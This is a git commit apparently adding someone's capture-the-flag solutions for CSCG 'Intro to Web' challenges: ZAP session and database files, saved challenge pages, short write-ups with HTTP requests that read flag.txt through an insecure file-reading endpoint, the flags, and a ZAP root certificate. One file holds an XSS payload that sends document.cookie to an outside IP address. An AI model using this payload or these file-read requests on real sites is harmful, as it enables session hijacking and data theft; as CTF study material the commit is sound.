changed repo structure

This commit is contained in:
2025-06-06 02:50:04 +02:00
parent e887de976a
commit 6e6ee357b8
8848 changed files with 2089898 additions and 9 deletions

View File

@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<session>
<sessionId>1709342352801</sessionId>
<sessionName>Untitled Session</sessionName>
<sessionDesc/>
</session>

View File

@@ -0,0 +1,5 @@
#HSQL Database Engine 2.7.2
#Sat Mar 02 02:25:05 CET 2024
tx_timestamp=1712
modified=no
version=2.7.2

View File

@@ -0,0 +1,118 @@
SET DATABASE UNIQUE NAME HSQLDB379AF3DEBD
SET DATABASE DEFAULT RESULT MEMORY ROWS 0
SET DATABASE EVENT LOG LEVEL 0
SET DATABASE TRANSACTION CONTROL LOCKS
SET DATABASE DEFAULT ISOLATION LEVEL READ COMMITTED
SET DATABASE TRANSACTION ROLLBACK ON CONFLICT TRUE
SET DATABASE TEXT TABLE DEFAULTS ''
SET DATABASE SQL NAMES FALSE
SET DATABASE SQL RESTRICT EXEC FALSE
SET DATABASE SQL REFERENCES FALSE
SET DATABASE SQL SIZE TRUE
SET DATABASE SQL TYPES FALSE
SET DATABASE SQL TDC DELETE TRUE
SET DATABASE SQL TDC UPDATE TRUE
SET DATABASE SQL SYS INDEX NAMES FALSE
SET DATABASE SQL CONCAT NULLS TRUE
SET DATABASE SQL UNIQUE NULLS TRUE
SET DATABASE SQL CONVERT TRUNCATE TRUE
SET DATABASE SQL AVG SCALE 0
SET DATABASE SQL DOUBLE NAN TRUE
SET FILES WRITE DELAY 20 MILLIS
SET FILES BACKUP INCREMENT TRUE
SET FILES CACHE SIZE 32000
SET FILES CACHE ROWS 50000
SET FILES SCALE 64
SET FILES LOB SCALE 32
SET FILES DEFRAG 0
SET FILES NIO TRUE
SET FILES NIO SIZE 256
SET FILES LOG TRUE
SET FILES LOG SIZE 50
SET FILES CHECK 1712
SET DATABASE COLLATION "SQL_TEXT" PAD SPACE
CREATE USER SA PASSWORD DIGEST 'd41d8cd98f00b204e9800998ecf8427e'
ALTER USER SA SET LOCAL TRUE
CREATE SCHEMA PUBLIC AUTHORIZATION DBA
CREATE CACHED TABLE PUBLIC.HISTORY(HISTORYID INTEGER GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL PRIMARY KEY,SESSIONID BIGINT NOT NULL,HISTTYPE INTEGER DEFAULT 1,STATUSCODE INTEGER DEFAULT 0,TIMESENTMILLIS BIGINT DEFAULT 0,TIMEELAPSEDMILLIS INTEGER DEFAULT 0,METHOD VARCHAR(1024) DEFAULT '',URI VARCHAR(1048576) DEFAULT '',REQHEADER VARCHAR(4194304) DEFAULT '',REQBODY VARBINARY(16777216) DEFAULT X'',RESHEADER VARCHAR(4194304) DEFAULT '',RESBODY VARBINARY(16777216) DEFAULT X'',TAG VARCHAR(32768) DEFAULT '',NOTE VARCHAR(1048576) DEFAULT '',RESPONSEFROMTARGETHOST BOOLEAN DEFAULT FALSE)
ALTER TABLE PUBLIC.HISTORY ALTER COLUMN HISTORYID RESTART WITH 3
CREATE INDEX HISTORY_INDEX ON PUBLIC.HISTORY(URI,METHOD,REQBODY,SESSIONID,HISTTYPE,HISTORYID,STATUSCODE)
CREATE INDEX INDEX_HISTORY_HISTTYPE ON PUBLIC.HISTORY(HISTTYPE)
CREATE INDEX INDEX_HISTORY_SESSIONID ON PUBLIC.HISTORY(SESSIONID)
CREATE CACHED TABLE PUBLIC.SESSION(SESSIONID BIGINT NOT NULL PRIMARY KEY,SESSIONNAME VARCHAR(32768) DEFAULT '',LASTACCESS TIMESTAMP DEFAULT LOCALTIMESTAMP NOT NULL)
CREATE CACHED TABLE PUBLIC.ALERT(ALERTID INTEGER GENERATED BY DEFAULT AS IDENTITY(START WITH 0) NOT NULL PRIMARY KEY,SCANID INTEGER NOT NULL,PLUGINID INTEGER DEFAULT 0,ALERT VARCHAR(16777216) DEFAULT '',RISK INTEGER DEFAULT 0,RELIABILITY INTEGER DEFAULT 1,DESCRIPTION VARCHAR(16777216) DEFAULT '',URI VARCHAR(1048576) DEFAULT '',PARAM VARCHAR(32768) DEFAULT '',OTHERINFO VARCHAR(16777216) DEFAULT '',SOLUTION VARCHAR(16777216) DEFAULT '',REFERENCE VARCHAR(16777216) DEFAULT '',HISTORYID INTEGER,SOURCEHISTORYID INTEGER DEFAULT 0,ATTACK VARCHAR(32768) DEFAULT '',EVIDENCE VARCHAR(16777216) DEFAULT '',CWEID INTEGER DEFAULT -1,WASCID INTEGER DEFAULT -1,SOURCEID INTEGER DEFAULT 0,INPUT_VECTOR VARCHAR(256) DEFAULT '',ALERTREF VARCHAR(256) DEFAULT '')
ALTER TABLE PUBLIC.ALERT ALTER COLUMN ALERTID RESTART WITH 7
CREATE INDEX ALERT_INDEX ON PUBLIC.ALERT(SOURCEHISTORYID)
CREATE INDEX INDEX_ALERT_SOURCEID ON PUBLIC.ALERT(SOURCEID)
CREATE CACHED TABLE PUBLIC.SCAN(SCANID INTEGER GENERATED BY DEFAULT AS IDENTITY(START WITH 0) NOT NULL PRIMARY KEY,SESSIONID BIGINT NOT NULL,SCANNAME VARCHAR(32768) DEFAULT '',SCANTIME TIMESTAMP DEFAULT LOCALTIMESTAMP NOT NULL)
ALTER TABLE PUBLIC.SCAN ALTER COLUMN SCANID RESTART WITH 0
CREATE CACHED TABLE PUBLIC.CONTEXT_DATA(DATAID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL,CONTEXTID INTEGER NOT NULL,TYPE INTEGER NOT NULL,DATA VARCHAR(1048576) DEFAULT '')
ALTER TABLE PUBLIC.CONTEXT_DATA ALTER COLUMN DATAID RESTART WITH 52
CREATE INDEX INDEX_CONTEXT_DATA_CONTEXTID ON PUBLIC.CONTEXT_DATA(CONTEXTID)
CREATE INDEX INDEX_CONTEXT_DATA_TYPE ON PUBLIC.CONTEXT_DATA(TYPE)
CREATE CACHED TABLE PUBLIC.PARAM(PARAMID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL,SITE VARCHAR(32768) NOT NULL,TYPE VARCHAR(32768) NOT NULL,NAME VARCHAR(32768) NOT NULL,USED INTEGER NOT NULL,FLAGS VARCHAR(32768) NOT NULL,VALS VARCHAR(8388608) NOT NULL)
ALTER TABLE PUBLIC.PARAM ALTER COLUMN PARAMID RESTART WITH 11
CREATE CACHED TABLE PUBLIC.SESSION_URL(URLID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL,TYPE INTEGER NOT NULL,URL VARCHAR(8192) DEFAULT '')
ALTER TABLE PUBLIC.SESSION_URL ALTER COLUMN URLID RESTART WITH 1
CREATE INDEX INDEX_SESSION_URL_TYPE_AND_URL ON PUBLIC.SESSION_URL(TYPE,URL)
CREATE CACHED TABLE PUBLIC.TAG(TAGID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL,HISTORYID BIGINT NOT NULL,TAG VARCHAR(1024) DEFAULT '')
ALTER TABLE PUBLIC.TAG ALTER COLUMN TAGID RESTART WITH 3
CREATE INDEX INDEX_TAG_HISTORYID_TAG ON PUBLIC.TAG(HISTORYID,TAG)
CREATE CACHED TABLE PUBLIC.ALERT_TAG(TAG_ID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL PRIMARY KEY,ALERT_ID BIGINT NOT NULL,KEY VARCHAR(1024) DEFAULT '' NOT NULL,VALUE VARCHAR(4000) DEFAULT '' NOT NULL)
ALTER TABLE PUBLIC.ALERT_TAG ALTER COLUMN TAG_ID RESTART WITH 17
CREATE INDEX ALERT_ID_INDEX ON PUBLIC.ALERT_TAG(ALERT_ID)
CREATE CACHED TABLE PUBLIC.STRUCTURE(STRUCTUREID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 1) NOT NULL,SESSIONID BIGINT NOT NULL,PARENTID BIGINT NOT NULL,HISTORYID INTEGER,NAME VARCHAR(8192) NOT NULL,NAMEHASH BIGINT NOT NULL,URL VARCHAR(8192) NOT NULL,METHOD VARCHAR(10) NOT NULL)
ALTER TABLE PUBLIC.STRUCTURE ALTER COLUMN STRUCTUREID RESTART WITH 1
CREATE CACHED TABLE PUBLIC.WEBSOCKET_CHANNEL(CHANNEL_ID BIGINT PRIMARY KEY,HOST VARCHAR(255) NOT NULL,PORT INTEGER NOT NULL,URL VARCHAR(1048576) NOT NULL,START_TIMESTAMP TIMESTAMP NOT NULL,END_TIMESTAMP TIMESTAMP,HISTORY_ID INTEGER,FOREIGN KEY(HISTORY_ID) REFERENCES PUBLIC.HISTORY(HISTORYID) ON DELETE SET NULL ON UPDATE SET NULL)
CREATE CACHED TABLE PUBLIC.WEBSOCKET_MESSAGE(MESSAGE_ID BIGINT NOT NULL,CHANNEL_ID BIGINT NOT NULL,TIMESTAMP TIMESTAMP NOT NULL,OPCODE TINYINT NOT NULL,PAYLOAD_UTF8 CLOB(16M),PAYLOAD_BYTES BLOB(16M),PAYLOAD_LENGTH BIGINT NOT NULL,IS_OUTGOING BOOLEAN NOT NULL,PRIMARY KEY(MESSAGE_ID,CHANNEL_ID),FOREIGN KEY(CHANNEL_ID) REFERENCES PUBLIC.WEBSOCKET_CHANNEL(CHANNEL_ID),CONSTRAINT WEBSOCKET_MESSAGE_PAYLOAD CHECK((PUBLIC.WEBSOCKET_MESSAGE.PAYLOAD_UTF8 IS NOT NULL) OR (PUBLIC.WEBSOCKET_MESSAGE.PAYLOAD_BYTES IS NOT NULL)))
CREATE CACHED TABLE PUBLIC.WEBSOCKET_MESSAGE_FUZZ(FUZZ_ID BIGINT NOT NULL,MESSAGE_ID BIGINT NOT NULL,CHANNEL_ID BIGINT NOT NULL,STATE VARCHAR(50) NOT NULL,FUZZ VARCHAR(16777216) NOT NULL,PRIMARY KEY(FUZZ_ID,MESSAGE_ID,CHANNEL_ID),FOREIGN KEY(MESSAGE_ID,CHANNEL_ID) REFERENCES PUBLIC.WEBSOCKET_MESSAGE(MESSAGE_ID,CHANNEL_ID) ON DELETE CASCADE)
CREATE CACHED TABLE PUBLIC.SOAP_WSDL(WSDL_ID INTEGER NOT NULL,SOAP_ACTION VARCHAR(4000) NOT NULL,PRIMARY KEY(WSDL_ID,SOAP_ACTION))
CREATE CACHED TABLE PUBLIC.OPENAPI_SPECS(ID INTEGER GENERATED BY DEFAULT AS IDENTITY(START WITH 0) NOT NULL PRIMARY KEY,DEFINITION CLOB(64M) NOT NULL,TARGET VARCHAR(2048),SESSION_ID BIGINT NOT NULL,CONTEXT_ID INTEGER NOT NULL)
ALTER TABLE PUBLIC.OPENAPI_SPECS ALTER COLUMN ID RESTART WITH 0
ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 15
SET DATABASE DEFAULT INITIAL SCHEMA PUBLIC
SET TABLE PUBLIC.HISTORY INDEX '105 105 105 105 0 0 0 0 1'
SET TABLE PUBLIC.SESSION INDEX '104 0 1'
SET TABLE PUBLIC.ALERT INDEX '369 369 369 0 0 0 7'
SET TABLE PUBLIC.CONTEXT_DATA INDEX '63 63 63 0 0 0 51'
SET TABLE PUBLIC.PARAM INDEX '483 0 10'
SET TABLE PUBLIC.TAG INDEX '475 475 0 0 2'
SET TABLE PUBLIC.ALERT_TAG INDEX '386 386 0 0 16'
SET TABLE PUBLIC.WEBSOCKET_CHANNEL INDEX '536 536 0 0 1'
SET TABLE PUBLIC.WEBSOCKET_MESSAGE INDEX '522 522 0 0 14'
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.CARDINAL_NUMBER TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.YES_OR_NO TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.CHARACTER_DATA TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.SQL_IDENTIFIER TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.TIME_STAMP TO PUBLIC
GRANT DBA TO SA
SET SCHEMA SYSTEM_LOBS
INSERT INTO BLOCKS VALUES(14,2147483633,0)
INSERT INTO LOBS VALUES(0,1,0,1)
INSERT INTO LOBS VALUES(1,1,0,2)
INSERT INTO LOBS VALUES(2,1,0,3)
INSERT INTO LOBS VALUES(3,1,0,4)
INSERT INTO LOBS VALUES(4,1,0,5)
INSERT INTO LOBS VALUES(5,1,0,6)
INSERT INTO LOBS VALUES(6,1,0,7)
INSERT INTO LOBS VALUES(7,1,0,8)
INSERT INTO LOBS VALUES(8,1,0,9)
INSERT INTO LOBS VALUES(9,1,0,10)
INSERT INTO LOBS VALUES(10,1,0,11)
INSERT INTO LOBS VALUES(11,1,0,12)
INSERT INTO LOBS VALUES(12,1,0,13)
INSERT INTO LOBS VALUES(13,1,0,14)
INSERT INTO LOB_IDS VALUES(1,64,1,40)
INSERT INTO LOB_IDS VALUES(2,64,1,40)
INSERT INTO LOB_IDS VALUES(3,64,1,40)
INSERT INTO LOB_IDS VALUES(4,64,1,40)
INSERT INTO LOB_IDS VALUES(5,64,1,40)
INSERT INTO LOB_IDS VALUES(6,64,1,40)
INSERT INTO LOB_IDS VALUES(7,64,1,40)
INSERT INTO LOB_IDS VALUES(8,64,1,40)
INSERT INTO LOB_IDS VALUES(9,64,1,40)
INSERT INTO LOB_IDS VALUES(10,64,1,40)
INSERT INTO LOB_IDS VALUES(11,64,1,40)
INSERT INTO LOB_IDS VALUES(12,64,1,40)
INSERT INTO LOB_IDS VALUES(13,64,1,40)
INSERT INTO LOB_IDS VALUES(14,64,1,40)

View File

@@ -0,0 +1,13 @@
### 1. Part
After doing Inspect Element on the grayed out text I found a part of the flag: CSCG{ImgAvH8w5
### 2. Part
Inspecting the timer funtion and running it yields the second Part of the flag 1a7364a71
### 3. Part
With the help of ZAP we get the third part of the flag from the response header VdGb98br}
Full flag: CSCG{ImgAvH8w51a7364a71VdGb98br}

View File

@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<session>
<sessionId>1709346750724</sessionId>
<sessionName>Untitled Session</sessionName>
<sessionDesc/>
</session>

View File

@@ -0,0 +1,5 @@
#HSQL Database Engine 2.7.2
#Sat Mar 02 04:14:43 CET 2024
tx_timestamp=61202
modified=no
version=2.7.2

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,19 @@
<html>
<head>
<title>Intro to Web 2</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<h1>Burn After Reading</h1>
This page automatically retrieves confidential information.
To protect against unauthorized use, the backend server will irreversibly nuke all of our data in
case this page is accessed by someone that failed to pass our
<em>Military-Grade Security Gate&#8482;</em>.
<h3>Status of flag document:
<span style="color:green">INTACT</span></h3>
<hr>
<pre>
Flag part 4/4: W4at6R2B}</pre>
</body>
</html>

View File

@@ -0,0 +1,16 @@
<html>
<head>
<title>Intro to Web 2</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<h1>Statistics Console (POST version)</h1>
<h3>File Name:
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
<hr>
<pre>
Flag part 2/4: UaT0BVvk</pre>
</body>
</html>

View File

@@ -0,0 +1,16 @@
<html>
<head>
<title>Intro to Web 2</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<h1>Statistics Console (GET version)</h1>
<h3>File Name:
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
<hr>
<pre>
Flag part 3/4: Q9Z39J9A</pre>
</body>
</html>

View File

@@ -0,0 +1,52 @@
<html>
<head>
<title>Intro to Web 2</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<h1>$(GERMAN_CITY) Tram Ticket Machine</h1>
<h3>Get your <span style="text-decoration: line-through;">ticket</span> flag here!</h3>
<hr>
With the help of our state-of-the-art floppy disk switching robots, you can now read the first
part of the flag in real time!
<p>
Flag part 1/4: <span style="color: green; font-family: 'Courier New', monospace;">
CSCG{<span id="flag">........</span></span>
<!--
No time to wait, right?
-->
<script>
flag = "l9jj550K"
symbolsRevealed = 0
waitTime = 1000;
function nextSymbol() {
if (symbolsRevealed >= flag.length) return;
symbolsRevealed++;
waitTime *= 2;
setTimeout(nextSymbol, waitTime);
}
function spin() {
const flagPart = flag.substr(0, symbolsRevealed);
const alphabet = ("ABCDEFGHIJKLMNOPRSTUVWXYZabcdefhiklmnorstuvwxz0123456789")
const randomSymbol =
symbolsRevealed < flag.length
? alphabet.charAt(Math.floor(Math.random() * alphabet.length))
: "";
const suffix = ".".repeat(Math.max(0, flag.length - 1 - symbolsRevealed));
document.getElementById("flag").innerHTML = flagPart + randomSymbol + suffix;
}
setTimeout(nextSymbol, waitTime);
setInterval(spin, 50);
</script>
</body>
</html>

View File

@@ -0,0 +1,57 @@
### 1.Part
We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html)
### 2. Part
There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt.
Sending the following request:
```http
POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
content-length: 17
Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
Connection: keep-alive
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
filename=flag.txt
```
Yields the page [statistics_console.html](leaked_sites/statistics_console.html)
### 3. Part
A similar bug can be used with a GET request to get the content of the flag.txt file.
This time we use a faulty php file called read-file.php
```http
GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
content-length: 0
```
Returns the page [statistics_console_get.html](leaked_sites/statistics_console_get.html)
### 4.Part
We now have to intercept a request made and change the authority information.
When we do this we get the fourth part of the flag.
### flag
CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}

View File

@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<session>
<sessionId>1709349390960</sessionId>
<sessionName>Untitled Session</sessionName>
<sessionDesc/>
</session>

View File

@@ -0,0 +1,5 @@
#HSQL Database Engine 2.7.2
#Sat Mar 02 06:24:05 CET 2024
tx_timestamp=197255
modified=no
version=2.7.2

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1 @@
Flag: CSCG{Q8oIoy3Ps956UwvvWIfJAzNs}

View File

@@ -0,0 +1 @@
<img src=/ onerror="xhr = new XMLHttpRequest();xhr.open('GET','http://49.12.225.44:8000/c/'+document.cookie);xhr.send()"></img>

View File

@@ -0,0 +1,29 @@
-----BEGIN CERTIFICATE-----
MIIE6DCCA9CgAwIBAgIEOe+YWDANBgkqhkiG9w0BAQsFADB1MSEwHwYDVQQDDBha
ZWQgQXR0YWNrIFByb3h5IFJvb3QgQ0ExFzAVBgNVBAcMDjJlN2I1OTVlN2M3MDhm
MRQwEgYDVQQKDAtaQVAgUm9vdCBDQTEUMBIGA1UECwwLWkFQIFJvb3QgQ0ExCzAJ
BgNVBAYTAnh4MB4XDTI0MDMwMjAxMTg1N1oXDTI1MDMwMjAxMTg1N1owdTEhMB8G
A1UEAwwYWmVkIEF0dGFjayBQcm94eSBSb290IENBMRcwFQYDVQQHDA4yZTdiNTk1
ZTdjNzA4ZjEUMBIGA1UECgwLWkFQIFJvb3QgQ0ExFDASBgNVBAsMC1pBUCBSb290
IENBMQswCQYDVQQGEwJ4eDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AJtWBExIk7Xi2fqEaC0seiBqwk2HP3WIBflifDL4ESHkLYHCcFzMyGvAZi5hM0xW
U4I6Ap0CxxbtQ/8XhomPlOMGUAIVVnv2ecdFzjbPTgRRj8cwGEaO1Ipj+NHC+4Ix
BdBlN2rA5KjPJWh9PxZevYEsmqGJvdMH0wvkiWEKwgwjTkc01WiVylEKrbIIZuxa
oRetca+19M+3rzgv+4wzAiGIDWw/pLQRXWdCUJiUMlQPhsDD4iD7a6NUhPZnqwbz
qTRyOiP3wvermpXuY591H3h+8V4a9tZu4PBNu6anzgSYz3kO3G9hen2hRUFXz3tp
6HPiRd8oRLAN6dKS9LbpqnMCAwEAAaOCAX4wggF6MIIBMwYDVR0OBIIBKgSCASYw
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCbVgRMSJO14tn6hGgtLHog
asJNhz91iAX5Ynwy+BEh5C2BwnBczMhrwGYuYTNMVlOCOgKdAscW7UP/F4aJj5Tj
BlACFVZ79nnHRc42z04EUY/HMBhGjtSKY/jRwvuCMQXQZTdqwOSozyVofT8WXr2B
LJqhib3TB9ML5IlhCsIMI05HNNVolcpRCq2yCGbsWqEXrXGvtfTPt684L/uMMwIh
iA1sP6S0EV1nQlCYlDJUD4bAw+Ig+2ujVIT2Z6sG86k0cjoj98L3q5qV7mOfdR94
fvFeGvbWbuDwTbump84EmM95DtxvYXp9oUVBV897aehz4kXfKESwDenSkvS26apz
AgMBAAEwDwYDVR0TAQH/BAUwAwEB/zALBgNVHQ8EBAMCAbYwIwYDVR0lBBwwGgYI
KwYBBQUHAwEGCCsGAQUFBwMCBgRVHSUAMA0GCSqGSIb3DQEBCwUAA4IBAQCIi/KG
HKQmpguOx+Lyf0AYSx1P6+eW2O5TjnLULLuws47Cz6m9WSTYTXu+UW4Qvo3CKfA2
nOK/Cp7cayKvZMzda+agoE2sal4lPMvQaLNZyYDanHGbIiuZT67bI6FpgrxzUmLc
wH8gu0El1GZlk+bM4ISH2C+gUABUVhOAvy/7QjsSFzgD0OUG7YsrSU7JrAwf8qzs
QtFpUycagIIFAsVt8d6j8rVxmcUHX/XJqWGDg9zeJSLNhNyRnogDOfkxVON2t/Gh
usTh5l604OG39R5Xkyk3DxPe7Te6LdFVKJqrWlFoiiEN2ZxrM3tcr+6zRDR76n7z
w/t/wLHtAyYo/ND3
-----END CERTIFICATE-----